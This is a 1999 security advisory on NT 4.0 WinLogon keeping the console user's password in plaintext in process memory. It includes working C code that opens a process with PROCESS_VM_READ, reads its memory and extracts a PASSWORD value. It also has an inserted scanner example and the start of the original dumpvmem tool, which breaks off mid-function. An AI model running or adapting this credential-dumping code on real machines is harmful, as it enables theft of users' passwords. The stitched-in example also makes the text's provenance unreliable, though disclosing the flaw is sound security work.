NT WinLogon VM contains plaintext password visible in admin mode
7 Dec. 1999
Summary
WinLogon's process contains the password used to logon to the NT station in plaintext.
Exploiting this requires administrative rights, but the implications are obvious: a social-engineering attack, or an exploit run after an administrative account has been compromised, yields the plaintext password of the user logged on at the console. This works on NT 4.0 with Service Pack 4 or below. Service Pack 5 corrects this behavior (it blocks access to the first 10K of the WinLogon memory space).
Credit:
This information has been provided by: Robert Horvick.
The basic idea is to open WinLogon's process with OpenProcess, requesting PROCESS_VM_READ, and then read its address space with ReadProcessMemory. Within the first several hundred readable bytes, stored as Unicode (UTF-16LE) environment-variable strings, is the logged-on user's password, twice, in plaintext and in an easy-to-parse NAME=VALUE form.
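The parsing half of that procedure, as an added example that is not Robert Horvick's dumpvmem code: it scans a block of process memory for the UTF-16LE "NAME=VALUE" strings an NT environment block is made of and looks one up by name. The memory buffer is constructed inline, and the variable names in it (USERNAME, USERDOMAIN, PASSWORD) are invented for the demonstration; the advisory does not say what WinLogon calls the variable that holds the password. The Win32 read path (OpenProcess with PROCESS_VM_READ plus ReadProcessMemory) is compiled only on Windows and needs the administrator rights the advisory describes.

```c
/* Added example, not the advisory's own code: find UTF-16LE NAME=VALUE
 * strings in a memory dump. Sample data is constructed; variable names
 * are invented. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Decode a run of printable ASCII stored as UTF-16LE at buf[pos].
 * Writes the ASCII form to out (NUL terminated) and returns its length. */
static size_t read_utf16_run(const unsigned char *buf, size_t len, size_t pos,
                             char *out, size_t outlen)
{
    size_t n = 0;
    while (pos + 1 < len && n + 1 < outlen) {
        unsigned char lo = buf[pos], hi = buf[pos + 1];
        if (hi != 0 || lo < 0x20 || lo > 0x7e)
            break;
        out[n++] = (char)lo;
        pos += 2;
    }
    out[n] = '\0';
    return n;
}

/* Extract every NUL-terminated UTF-16LE string of 4+ characters that
 * contains '=' (the shape of an environment variable). Strings need not
 * be aligned, so on a miss the scan advances one byte. Returns the count. */
size_t find_env_strings(const unsigned char *buf, size_t len,
                        char matches[][128], size_t max_matches)
{
    size_t found = 0, pos = 0;
    char tmp[128];

    while (pos + 1 < len && found < max_matches) {
        size_t n = read_utf16_run(buf, len, pos, tmp, sizeof tmp);
        if (n >= 4 && strchr(tmp, '=') != NULL && pos + 2 * n + 1 < len
            && buf[pos + 2 * n] == 0 && buf[pos + 2 * n + 1] == 0) {
            strcpy(matches[found++], tmp);
            pos += 2 * n + 2;       /* skip string and its terminator */
        } else {
            pos += 1;
        }
    }
    return found;
}

/* Value of the first NAME=VALUE match whose name equals name, or NULL. */
const char *env_value(char matches[][128], size_t count, const char *name)
{
    size_t i, nl = strlen(name);
    for (i = 0; i < count; i++)
        if (strncmp(matches[i], name, nl) == 0 && matches[i][nl] == '=')
            return matches[i] + nl + 1;
    return NULL;
}

/* Constructed sample dump: a few junk bytes, then UTF-16LE NAME=VALUE
 * strings, each NUL terminated, with the password present twice as the
 * advisory reports. Names and values are invented. Returns bytes written. */
size_t build_sample_dump(unsigned char *buf, size_t len)
{
    static const char *vars[] = { "USERNAME=alice", "USERDOMAIN=CORP",
                                  "PASSWORD=hunter2", "PASSWORD=hunter2" };
    static const unsigned char junk[] = { 0x00, 0x10, 0x40, 0x00, 0x7f, 0x01 };
    size_t pos = sizeof junk, i;

    memcpy(buf, junk, sizeof junk);
    for (i = 0; i < sizeof vars / sizeof vars[0]; i++) {
        const char *s = vars[i];
        while (*s && pos + 1 < len) { buf[pos++] = (unsigned char)*s++; buf[pos++] = 0; }
        if (pos + 1 < len) { buf[pos++] = 0; buf[pos++] = 0; }
    }
    return pos;
}

/* Build the sample and scan it; used by main() and by the checks below. */
size_t scan_sample(char matches[][128], size_t max_matches)
{
    unsigned char buf[512];
    size_t len = build_sample_dump(buf, sizeof buf);
    return find_env_strings(buf, len, matches, max_matches);
}

#ifdef _WIN32
/* Open pid with PROCESS_VM_READ and copy len bytes from base into buf.
 * Returns bytes read, 0 on failure. For WinLogon this needs admin rights. */
size_t read_process_region(DWORD pid, const void *base, unsigned char *buf, size_t len)
{
    HANDLE h = OpenProcess(PROCESS_VM_READ, FALSE, pid);
    SIZE_T got = 0;
    if (h == NULL) return 0;
    if (!ReadProcessMemory(h, base, buf, len, &got)) got = 0;
    CloseHandle(h);
    return (size_t)got;
}
#endif

int main(int argc, char **argv)
{
    unsigned char buf[4096];
    char matches[64][128];
    size_t len, n, i;
    const char *pw;

    (void)argc; (void)argv;
#ifdef _WIN32
    /* usage: scanenv <pid> <hex base address>  reads 4 KB of a live process */
    if (argc == 3)
        len = read_process_region((DWORD)strtoul(argv[1], NULL, 10),
                                  (const void *)(uintptr_t)strtoull(argv[2], NULL, 16),
                                  buf, sizeof buf);
    else
#endif
        len = build_sample_dump(buf, sizeof buf);

    n = find_env_strings(buf, len, matches, 64);
    for (i = 0; i < n; i++)
        printf("%s\n", matches[i]);
    pw = env_value(matches, n, "PASSWORD");
    printf("PASSWORD -> %s\n", pw ? pw : "(not found)");
    return 0;
}
```

Run without arguments it scans the constructed sample; on Windows, given a PID and a hex base address, it reads 4 KB from that process instead and scans the same way, so the parser can be pointed at a dumpvmem output file or a live region.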
Here is some code that demonstrates this; you must be running as administrator for it to work:
/***************************************************************
* dumpvmem
*
* dumps the contents of a process virtual mem to a file for
* browsing later. If run with admin privs and the process
* winlogon is used ... the users password is all over the
* place in the first few hundred bytes.
*
* Robert Horvick [Kanin] Great Plains Software
* 12/2/1999 rhorvick@acm.org
*
*
* Command Line
* pid - decimal process id
* szPath - path to the file to dump memory to
*
****************************************************************/
#include <windows.h>
#include <stdio.h>
/*
* Highly inefficient: it reads one byte at a time, while memory is
* committed in page-size minimums, so page-sized reads should be used
* for real work. Since the password shows up so quickly ... meh.
*/
DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
{
LPSTR lpOffset = (void*)1;
CHAR vBuf[1];
DWORD dwRead = 0;
BOOL bLastRead = FALSE;
DWORD dwDumpedBytes = 0;